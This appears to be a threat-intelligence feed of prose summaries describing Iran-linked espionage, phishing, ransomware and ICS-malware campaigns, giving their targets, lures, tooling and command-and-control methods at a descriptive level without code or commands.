Threats Feed

Researchers uncovered SpearSpecter, an IRGC-IO–aligned cyber-espionage campaign targeting senior defense and government officials, alongside their family members, to expand pressure on primary targets. The group uses long-term social engineering, including WhatsApp engagement and impersonation of trusted contacts, to deliver highly personalized lures. Initial access relies on crafted meeting documents, WebDAV-based delivery, and malicious LNK shortcuts that launch TAMECAT, a modular PowerShell backdoor enabling reconnaissance, credential harvesting, browser data extraction, Outlook OST theft, screenshot capture, and encrypted exfiltration. SpearSpecter employs a resilient multi-channel C2 architecture using HTTPS, Telegram, and Discord, plus Cloudflare Workers for staging, reflecting a stealthy and persistent IRGC-linked intelligence-collection effort.

Proofpoint uncovered a new Iranian-linked activity cluster, UNK_SmudgedSerpent, which overlaps with known groups TA453 (Charming Kitten), TA455 (Smoke Sandstorm), and TA450 (MuddyWater). Active between June and August 2025, the group targeted US-based think tank and academic experts on Iranian affairs using phishing campaigns that impersonated Brookings and Washington Institute figures. The attacks began with benign email exchanges before transitioning to credential harvesting and the deployment of remote monitoring and management (RMM) tools such as PDQConnect and ISL Online. The campaign’s infrastructure and TTPs reflect Iran’s broader intelligence-collection goals and the growing overlap between its contractor-operated cyber units.

Group-IB uncovered a global phishing campaign by the Iran-linked APT MuddyWater, targeting international and humanitarian organizations across the Middle East, Europe, Africa, and North America. The group used a compromised mailbox accessed via NordVPN to send phishing emails with malicious Word documents containing VBA macros that deployed the Phoenix backdoor v4 through the FakeUpdate injector. The malware achieved persistence via Winlogon registry keys and COM hijacking, while a custom browser credential stealer and RMM tools (PDQ, Action1) facilitated remote access and credential harvesting. The campaign reflects MuddyWater’s evolving espionage capabilities and integration of custom and legitimate tools for stealth operations.

Nimbus Manticore, an Iranian threat actor overlapping with UNC1549 and Smoke Sandstorm, has intensified its espionage operations against defense manufacturing, telecommunications, and aviation sectors in Western Europe, notably Denmark, Sweden, and Portugal. The group uses spear-phishing lures posing as HR recruiters to deliver multi-stage DLL side-loading malware via fake career portals. Its evolving toolset—MiniJunk backdoor and MiniBrowse stealer—employs advanced obfuscation, code signing, and cloud-based C2 infrastructure on Azure and Cloudflare to evade detection. The campaign reflects a highly sophisticated, well-resourced actor aligned with IRGC intelligence objectives.

Subtle Snail operators deploy the MINIBIKE backdoor via DLL sideloading to gain persistent, high-privilege access. The malware stages in Public Users Documents using CopyFile2 and BITS, enforces single-instance execution with a UUID mutex, and builds a unique USERID from username, hostname, and DLL timestamp for HTTP POST C2 over WinHTTP. Modular components include an LCG-obfuscated keylogger that writes encrypted extended0.log files, a browser stealer that uses a Chrome-App-Bound decryption tool with process hollowing, and a CredUI-based Outlook/Winlogon prompt that saves stolen credentials. Operators use Azure-proxied domains for C2, automated chunked exfiltration, WinRAR archiving, and anti-analysis techniques including control flow flattening and dynamic API resolution. Targeted sectors include telecommunications organizations.

Iran-aligned threat actor linked to the MOIS group Homeland Justice conducted a large-scale spear-phishing campaign in August 2025, using a compromised mailbox of the Omani Ministry of Foreign Affairs to target embassies, consulates, and international organizations worldwide. The malicious Word attachments, disguised as official diplomatic notices, executed VBA macros that decoded and dropped the sysProcUpdate malware. Targets included diplomatic and government institutions across Europe, the Middle East, Africa, Asia, and the Americas, notably during sensitive ceasefire negotiations. The operation aimed at espionage and reconnaissance, leveraging obfuscation, sandbox evasion, and encrypted C2 communication with screenai.online.

APT MuddyWater has launched a multi-stage spear-phishing campaign targeting CFOs and finance executives across Europe, North America, South America, Africa, and Asia. Disguised as recruiters from Rothschild & Co, the attackers use Firebase-hosted phishing pages with CAPTCHA lures and malicious ZIP/VBS payloads to deploy legitimate remote-access tools like NetBird and OpenSSH for persistent control. The infection chain creates hidden admin accounts, enables RDP, and automates persistence via scheduled tasks. Infrastructure analysis reveals overlaps with earlier MuddyWater operations, confirming attribution and highlighting the group’s evolving phishing toolkit and adaptive use of trusted cloud services for global financial espionage.

The new Charming Kitten campaign demonstrates a significant escalation in the group’s operational maturity, combining strategic impersonation, long-term reconnaissance, and a large, automated infrastructure. The attackers impersonated Pentagon official Ariane Tabatabai to target Iranian activists, initiating contact via Telegram before redirecting victims through Google Sites to credential-harvesting domains using a WebSocket-based phishing kit. Evidence shows the group monitored security researcher activity for months, preparing infrastructure from May and launching operations in late July. More than 30 previously unseen domains support the campaign, reflecting increased automation, operational scale, and real-time monitoring. The operation highlights Charming Kitten’s growing geopolitical awareness and refined social engineering capability.

Iranian APT group MuddyWater deployed new versions of its Android surveillanceware DCHSpy amid the Israel-Iran conflict, targeting individuals via politically themed lures such as fake Starlink VPN apps. Distributed through Telegram and disguised as legitimate VPN or banking apps, DCHSpy harvests sensitive data including WhatsApp messages, SMS, call logs, contacts, device location, and audio. The malware compresses and encrypts exfiltrated data before uploading it to an attacker-controlled SFTP server. DCHSpy shares infrastructure with SandStrike, a tool previously used to target Baháʼí practitioners. Sectors targeted include telecommunications, defense, local government, and oil and gas across the Middle East, Asia, Africa, Europe, and North America.

Since February 2025, the Iranian-aligned Pay2Key.I2P ransomware-as-a-service (RaaS) operation—linked to Fox Kitten APT and Mimic ransomware—has launched ideologically driven attacks against Western targets. With a strong presence on Russian and Chinese darknet forums, the group markets an advanced ransomware builder with capabilities for both Windows and Linux. The payloads use advanced evasion techniques, including dual CMD/PowerShell scripts, Themida packing, and AV bypass tools like “NoDefender.” Over $4 million in ransom payments and 51 successful attacks were recorded in four months. Targets are not specified by country or sector, but the campaign’s rhetoric and infrastructure indicate a focus on geopolitical adversaries of Iran.

Educated Manticore, an Iranian APT group linked to the IRGC Intelligence Organization, launched spear-phishing campaigns targeting Israeli cybersecurity experts, computer science academics, and journalists. Using personas of fake cybersecurity employees or researchers, attackers engaged victims via email and WhatsApp, luring them to phishing pages disguised as Google or Google Meet login portals. A custom React-based phishing kit captured credentials and two-factor authentication tokens in real time via WebSocket, supported by infrastructure spanning over 130 attacker-controlled domains. The campaign emphasizes credential harvesting and identity theft in support of Iranian cyber-espionage objectives amid heightened Iran–Israel tensions.

BladedFeline, an Iran-aligned APT group likely linked to OilRig (APT34), has conducted a multi-year cyberespionage campaign targeting Kurdish and Iraqi government officials as well as a telecommunications provider in Uzbekistan. Active since at least 2017, the group deployed various custom tools—including the Shahmaran and Whisper backdoors, the PrimeCache IIS module, reverse tunnels (Laret and Pinar), and several post-compromise implants—to maintain long-term access. Whisper abuses Microsoft Exchange email infrastructure for covert C2, while PrimeCache leverages malicious IIS components. This activity highlights Iran’s strategic interest in regional political and telecommunications sectors.

A sophisticated spear-phishing campaign targeted CFOs and finance executives in banking, energy, insurance, and investment sectors across the UK, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil. Disguised as a Rothschild & Co recruiter, the attackers used Firebase-hosted phishing pages protected by custom CAPTCHAs to deliver multi-stage payloads. Victims who executed malicious VBS scripts unknowingly installed NetBird and OpenSSH, granting attackers persistent, encrypted remote access through hidden admin accounts and RDP activation. Trellix researchers identified infrastructure overlaps with previous nation-state campaigns but withheld attribution.

Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany’s Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and inactive album link suggest planned social engineering attacks. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group’s history of surveillance and influence operations against Iranian opposition figures.

A phishing campaign impersonating Avast targeted Israeli individuals and businesses—likely in the real estate and commercial sectors—through fraudulent antivirus receipts containing malware download links. The attack used multiple URL redirections and GitHub for payload delivery, culminating in the stealthy installation of the legitimate remote access tool ScreenConnect. Once installed, the malware achieved persistence via Windows services, modified authentication packages to access credentials, and established encrypted command and control connections. Evidence suggests similarities with tactics used by the MuddyWater APT group, though attribution remains inconclusive. The campaign’s infrastructure and system language checks confirm its Israeli focus.

The MuddyWater APT group has been observed using malicious macro-enabled Microsoft Word documents to compromise targets. Upon opening these documents and enabling macros, a VBScript backdoor is deployed, establishing communication with attacker-controlled command and control (C2) servers via HTTP. The VBScript backdoor receives and executes remote commands and sends results back to the C2 servers. Identified infrastructure includes domains and IP addresses employing HTTPS over port 443 for covert communication, aiding in firewall evasion.

APT34 (OilRig) has launched a targeted cyber espionage campaign against Iraqi government entities since 2024, using spearphishing emails with forged documents to deploy custom C# malware disguised as PDF files. The malware performs system reconnaissance, anti-VM checks, and sets up persistence via scheduled tasks. It communicates with command-and-control infrastructure through both HTTP and compromised Iraqi government email accounts (SMTP/IMAP). The group also utilizes European-hosted infrastructure with deceptive 404 pages and obfuscated communication protocols. Targeted sectors include government, energy, finance, defense, and telecommunications, indicating a continued focus on intelligence gathering in the Middle East.

Kaspersky has uncovered BellaCPP, a new C++ variant of the BellaCiao malware family, linked to the Charming Kitten threat actor. BellaCPP, found on an infected machine in Asia, features domain generation, XOR-encrypted string decryption, and SSH tunneling, with payloads stored in critical directories like C:\Windows\System32. It lacks a webshell, showing refined design. PDB paths reveal targeting details, highlighting evolving capabilities. These findings underscore the need for robust cybersecurity and thorough network scanning to combat such threats.

OilRig (APT34) has targeted the government, technology and energy sectors across the Middle East. Its operations include spearphishing campaigns, PowerShell-based backdoors (Helminth, QUADAGENT), and exploitation of vulnerabilities such as CVE-2024-30088. The group relies on obfuscation techniques to evade detection and uses tools such as STEALHOOK for privilege escalation, lateral movement and data exfiltration. Key targets include Saudi Arabian organisations and Middle Eastern government agencies, highlighting OilRig's focus on geopolitical intelligence gathering. The campaigns demonstrate advanced persistence, stealth and adaptability in line with state-sponsored objectives.

Team82's research details the IOCONTROL malware, a custom-built cyberweapon used by Iran-linked attackers, specifically the CyberAv3ngers group. The malware targets a range of industrial control systems (ICS) and Internet of Things (IoT) devices, notably impacting fuel management systems in Israel and the US. IOCONTROL's functionality includes communication via the MQTT protocol and features such as arbitrary code execution and self-deletion. The analysis reveals the malware's infrastructure, including its command-and-control server and the methods used to evade detection. The report concludes that IOCONTROL represents a significant threat to critical infrastructure, highlighting the ongoing geopolitical conflict.

APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware via forged legitimate programs and malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35’s activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.

Sophos MDR has identified a targeted phishing campaign, with moderate confidence attributed to the Iranian-linked threat actor group MuddyWater (TA450), which targeted organisations in Israel. The campaign involved phishing emails that tricked users into downloading a ZIP file containing an installer for the legitimate remote management tool Atera. After gaining access, the threat actors misused Atera, using a trial account believed to be compromised, to install the Atera Agent and run a PowerShell script for credential dumping and creating a backup of the SYSTEM registry hive, which Sophos behavioural rules detected and blocked. Post-compromise activities included domain enumeration commands, establishing an SSH tunnel to a remote IP address, and downloading another remote management tool, Level RMM, via an obfuscated PowerShell command. This campaign's tactics align with previously reported activity by TA450 and highlights the tactic of abusing legitimate software for malicious purposes.

A phishing campaign is exploiting sensational fake news about an assassination attempt on US President-elect Donald Trump by an Iranian sniper. The campaign poses as The New York Times using the email address newyork-times@nycmail[.]com. Victims who click on the embedded link are redirected to an ESET-imitation phishing site, where they are prompted to enter corporate domain credentials. This campaign is an example of attackers using major global events, such as political elections, to amplify their efforts. The use of urgency and sensational headlines highlights the need for vigilance in verifying information.